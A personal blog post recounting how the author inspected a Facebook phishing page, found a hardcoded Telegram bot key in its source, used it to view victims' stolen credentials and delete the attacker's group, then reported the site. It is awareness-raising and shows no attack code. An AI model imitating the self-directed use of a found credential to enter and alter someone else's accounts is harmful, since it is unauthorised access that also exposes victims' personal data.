Adem's Dev Journey

Phishing? Not on My Watch! How I found a phishing site and How I took it down

06 Jan 2024 | 5 mins read
general hacking

šŸ”Š PLAY THIS ARTICLE

Hello Again!

Today I will tell you a short story about how I found a phishing site and how I took it down.

Chapter 0: Why Iā€™m writing this

Iā€™m writing this article because I want to raise awareness about phishing sites. Especially phishing sites that target Facebook users. Many people fall for these scams and lose their accounts.

Recently, Iā€™ve seen many tunisian facebook pages that were hacked. Even big pages with millions of followers. I donā€™t want this to happen to me or to anyone else.

Chapter 1: How I found the phishing site

Have you ever imagined turning the tables on a hacker? Picture this: youā€™re browsing Facebook and you come across this post:

For those who donā€™t speak Arabic, it says:

āš ļøFinal warning
We've reviewed your account and noticed some unusual activity that goes against our Community Standards and Advertising Policies. Therefore, we have decided to suspend your account for the next 30 days.
This suspension will take effect within 24 hours. If you think this is a bug, click the button below to open a support ticket and let us know.
Check info on: https://facebook.com/l.php...
Please note that if we do not receive any response within 24 hours, the decision will be made by our team. Any advertising campaign can be canceled and you will no longer be able to access ads.
to thank,
Meta For Business Support Team

For the non-tech-savvy, the link looks legit. Itā€™s a facebook.com link, so it must be safe, right? Wrong! Itā€™s a phishing link.

l.php?u=<<URL_HERE>> is a facebook redirecting link.

The u parameter is the URL that the user will be redirected to.

If you click on it, youā€™ll be redirected to a fake facebook form where youā€™ll be asked to enter your username, password, and other personal information.

If you do that, the hacker will have access to your account and will be able to do whatever he wants with it.

Chapter 2: Pretending to be a victim

I decided to play along and see what happens next. I clicked on the link and visited the fake facebook form page.

āš ļø Disclaimer: I will not share the link to the phishing site. I will only share screenshots.

As you can see, the page looks legit. It has the facebook logo, the facebook colors, and the facebook font.

I opened DevTools and inspected the page. It was built using Vue.js. Iā€™ve searched for ā€œhttpsā€ links where the good stuff is usually hidden. I found a few interesting links:

Let me explain what is happening here:

https://api.db-ip.com is a public website that provides IP geolocation data. Itā€™s used to get the userā€™s IP address.

The developer is getting the victimā€™s IP address and sending it to the hackerā€™s server.

https://api.telegram.org is a the Telegram API. The hacker is using telegram to store the victimā€™s data.

The hacker is sending the victimā€™s data to his telegram account. He is even putting the API Key in the source code.

The API key looks like this: 123456789:ABCDEFGHIJKLMNOPQRSTUVWXYZ

What a noob! šŸ¤£ You should never put your API Key in the source code. Never!

So letā€™s recap what we have so far:

  1. The hacker is using a fake facebook form to steal the victimā€™s data.
  2. The hacker is using Vue.js to build the fake facebook form.
  3. The hacker is using https://api.db-ip.com to get the victimā€™s IP address.
  4. The hacker is using Telegram to send the victimā€™s data to his telegram account.
  5. The hacker is putting his Telegram API Key in the source code.

Letā€™s see what happens nextā€¦

Chapter 3: The hackerā€™s telegram account

I decided to read Telegramā€™s API documentation to see what we can do with the API Key. Surprisingly, we can do a lot of things with it.

Iā€™ve found a Swagger documentation for the Telegram API. You can find it here: https://telegram-bot-api.vercel.app/

So I decided to play around with the API and see what happens. Iā€™ve sent a few requests to the API and Iā€™ve found something interesting.

I found a list of victims. Email addresses, passwords, IP addresses, and other personal information.

Most of the victims are from Arab countries. Tunisia, Algeria, Jordan, Morocco, Egypt, etcā€¦

Using the API Key, I was able to get the invite link for the hackerā€™s telegram group.

Letā€™s see whatā€™s insideā€¦

This is the hackerā€™s telegram group. It has 10 members.

I think the hacker is from Vietnam. I donā€™t speak Vietnamese, so I canā€™t be sure.

Chapter 4: Itā€™s time to take action

Iā€™ve deleted the hackerā€™s telegram group and reported the hacker to Telegram.

The API key is also invalid now. So the hacker canā€™t use it anymore. šŸ˜

Also, Iā€™ve reported the hackerā€™s website to the hosting provider and theyā€™ve taken it down.

Thanks to the hosting provider for taking action so quickly. šŸ‘šŸ‘šŸ‘

Chapter 5: Conclusion

Phishing is a serious problem. Many people fall for these scams and lose their accounts.

If you see a suspicious link on Facebook, donā€™t click on it. Report it to Facebook and they will take it down.

If you have some knowledge about web development, check the source code of the page. You might find something interesting (like I did).

And if youā€™re a hacker, please stop hacking people. Itā€™s not cool. Itā€™s not funny. Itā€™s not worth it. Also, donā€™t put your API Key in the source code. Never! šŸ¤£šŸ¤£

Thatā€™s all for today. I hope you enjoyed this article. If you have any questions or comments, please leave them below.